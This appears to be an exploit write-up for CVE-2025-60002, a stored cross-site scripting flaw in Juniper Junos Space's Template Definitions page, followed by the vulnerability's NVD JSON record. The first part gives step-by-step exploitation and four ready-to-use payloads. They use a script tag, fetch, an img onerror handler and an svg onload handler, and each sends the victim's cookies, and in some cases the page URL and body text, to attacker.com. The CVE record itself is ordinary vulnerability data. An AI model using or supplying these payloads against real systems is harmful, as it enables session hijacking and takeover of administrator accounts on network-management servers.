CVE-2025-60002

<!-- CVE-2025-60002 - Juniper Junos Space Stored XSS PoC --> <!-- Vulnerability: Improper Neutralization of Input During Web Page Generation (XSS) --> <!-- Affected: Junos Space versions before 24.1R4 --> <!-- Location: Template Definitions page --> <!-- Step 1: Login to Junos Space with any valid account --> <!-- Step 2: Navigate to Template Definitions page --> <!-- Step 3: Create a new template or edit an existing one --> <!-- Step 4: Inject one of the following XSS payloads into the template name, description, or content field --> <!-- Payload 1: Basic Cookie Stealer --> <script>document.location='http://attacker.com/steal?c='+document.cookie</script> <!-- Payload 2: Session Hijacking via Fetch --> <script> fetch('http://attacker.com/collect', { method: 'POST', body: JSON.stringify({ cookies: document.cookie, url: window.location.href, user: document.body.innerText }) }); </script> <!-- Payload 3: Event Handler based (may bypass some filters) --> <img src=x onerror="fetch('http://attacker.com/x?'+document.cookie)"> <!-- Payload 4: SVG-based XSS --> <svg onload="new Image().src='http://attacker.com/log?'+document.cookie"> <!-- Step 5: Save the template --> <!-- Step 6: Wait for an administrator or privileged user to view the Template Definitions page --> <!-- Step 7: The injected script executes in the victim's browser context, potentially stealing session tokens or performing privileged actions --> <!-- Note: The actual exploitation would require a listener server to capture exfiltrated data -->

{"cve": {"id": "CVE-2025-60002", "sourceIdentifier": "[email protected]", "published": "2025-10-09T17:16:03.483", "lastModified": "2026-01-23T20:00:49.100", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Juniper Networks Junos Space allows an attacker to inject script tags in the Template Definitions page that, when visited by another user, enables the attacker to execute commands with the target's permissions, including an administrator.\nThis issue affects all versions of Junos Space before 24.1R4."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:juniper:junos_space:*:*:*:*:*:*:*:*", "versionEndExcluding": "24.1", "matchCriteriaId": "2EC090A9-634B-4AA2-916F-7548AF71FF76"}, {"vulnerable": true, "criteria": "cpe:2.3:a:juniper:junos_space:24.1:r1:*:*:*:*:*:*", "matchCriteriaId": "0566970C-0E9B-4566-9920-C7C436A4243D"}, {"vulnerable": true, "criteria": "cpe:2.3:a:juniper:junos_space:24.1:r2:*:*:*:*:*:*", "matchCriteriaId": "A2AA399D-5A7D-45B8-B774-D69054DFA4D3"}, {"vulnerable": true, "criteria": "cpe:2.3:a:juniper:junos_space:24.1:r3:*:*:*:*:*:*", "matchCriteriaId": "57CC4E1A-23AA-4B4A-8690-5EEDCBEC4BBE"}]}]}], "references": [{"url": "https://supportportal.juniper.net/JSA103140", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}